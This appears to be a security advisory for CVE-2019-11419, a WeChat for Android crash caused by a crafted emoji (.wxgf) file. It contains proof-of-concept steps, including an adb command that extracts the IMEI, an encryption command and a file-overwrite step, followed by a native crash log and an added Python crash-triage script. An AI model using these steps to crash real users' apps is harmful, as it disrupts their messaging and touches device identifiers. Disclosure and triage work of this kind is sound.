This DoS bug was reported to Tencent, but they decided not to fix it because it’s not critical. The Common Vulnerabilities and Exposures (CVE) Program has assigned the ID CVE-2019-11419 to this issue.
Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in the WeChat application for Android allows a DoS by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. The crash log is provided in the poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
Vulnerability Type:
Denial of Service
Vendor of Product:
Tencent
Affected Product Code Base:
WeChat for Android, up to the latest version (7.0.3)
Affected Component:
Function vcodec2_hls_filter in libvoipCodec_v7a.so
Attack Type:
Local
Attack vector:
A malware app can craft a malicious emoji file and overwrite the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat message that contains the emoji, WeChat will instantly crash.
POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
- The user must have sent or received a GIF file in WeChat.
- The malware app must retrieve the phone’s IMEI. For the POC, the following command can be used:
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=-
- Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]
- Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted.
- WeChat will now crash whenever a message that contains the overwritten emoji file is opened.
Crash log:
Process: com.tencent.mm
Crash Thread: 27374(total:122)
Date/Time: 2108-12-12 +8.00 13:34:50.135
Live Time: 35s
Device: Pixel 2 XL android-27
Exception info:
Siginfo: errno:0, pid:0, uid:0, process:
after unwind signal thread
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: google/taimen/taimen:8.1.0/OPM4.171019.021.R1/4833808:user/release-keys
pid: 27147, tid: 27374 >>> com.tencent.mm <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000
after dump thread backtrace
#00 pc 0x0 <unknown> (???)
#01 pc 0x1f739b /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filter+546)
#02 pc 0x1f8efb /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filters+134)
#03 pc 0x1efa5d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#04 pc 0x1ea94f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_default_execute+30)
#05 pc 0x1f1c59 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#06 pc 0x1eaa49 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_decode_video2+120)
#07 pc 0x1e375d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (Vcodec2DecodeMultipleNals+176)
#08 pc 0x1e510f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::decodeColorComponents(unsigned char*, int)+70)
#09 pc 0x1e5791 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::add_buffer(unsigned char*, int, int, StWxAMFrame**)+228)
#10 pc 0x1e5995 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (wxam_dec_decode_buffer_3+12)
#11 pc 0x4c435 /data/app/com.tencent.mm-XUPZwNZyUC6RN4utDMIYMw==/lib/arm/libwechatcommon.so (Java_com_tencent_mm_plugin_gif_MMWXGFJNI_nativeDecodeBufferFrame+148)
...
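As an added triage aid (written for this page, not part of the original report or of WeChat), the following Python script parses the Android native crash lines above and summarises what a responder would want first: the signal, the fault address, the first symbolised caller, and the JNI entry point that led into the native decoder. The sample log embedded in the script is a subset of the lines quoted above; the "kind" classification is an inference from pc 0x0 together with fault addr 0, which is consistent with a call through a null function pointer rather than a data read.

```python
import os
import re

# Constructed sample: a subset of the crash-log lines quoted in this advisory.
SAMPLE_LOG = """\
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000
after dump thread backtrace
#00 pc 0x0 <unknown> (???)
#01 pc 0x1f739b /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filter+546)
#02 pc 0x1f8efb /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filters+134)
#08 pc 0x1e510f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::decodeColorComponents(unsigned char*, int)+70)
#11 pc 0x4c435 /data/app/com.tencent.mm-XUPZwNZyUC6RN4utDMIYMw==/lib/arm/libwechatcommon.so (Java_com_tencent_mm_plugin_gif_MMWXGFJNI_nativeDecodeBufferFrame+148)
"""

SIGNAL_RE = re.compile(r"signal (\d+) \((\w+)\), code (\d+) \((\w+)\), fault addr ([0-9a-fA-F]+)")
FRAME_RE = re.compile(r"^#(\d+) pc (0x[0-9a-fA-F]+) (\S+)(?: \((.*)\))?$", re.M)

def parse_frames(log):
    """Return backtrace frames as dicts; unsymbolised '???' frames get symbol None."""
    frames = []
    for idx, pc, obj, sym in FRAME_RE.findall(log):
        name, offset = None, None
        if sym and sym != "???":
            name, plus, off = sym.rpartition("+")   # 'func(args)+70' -> 'func(args)', 70
            if plus:
                offset = int(off)
            else:
                name = sym
        frames.append({"index": int(idx), "pc": int(pc, 16),
                       "object": os.path.basename(obj), "symbol": name, "offset": offset})
    return frames

def triage(log):
    """Summarise the faulting signal and locate the first symbolised native caller."""
    sig = SIGNAL_RE.search(log)
    if not sig:
        raise ValueError("no signal line found")
    fault_addr = int(sig.group(5), 16)
    frames = parse_frames(log)
    pc0 = frames[0]["pc"] if frames else None
    caller = next((f for f in frames if f["symbol"]), None)        # where to read disassembly
    jni = next((f for f in frames if f["symbol"] and f["symbol"].startswith("Java_")), None)
    if pc0 == 0 and fault_addr == 0:
        kind = "control transfer to address 0 (null function pointer)"
    elif fault_addr < 0x1000:
        kind = "near-null data access"
    else:
        kind = "invalid memory access"
    return {"signal": sig.group(2), "code": sig.group(4), "fault_addr": fault_addr,
            "kind": kind, "caller": caller, "jni_entry": jni["symbol"] if jni else None}
```

Running `triage(SAMPLE_LOG)` points at vcodec2_hls_filter+546 in libvoipCodec_v7a.so as the frame to inspect, reached from the MMWXGFJNI.nativeDecodeBufferFrame JNI entry.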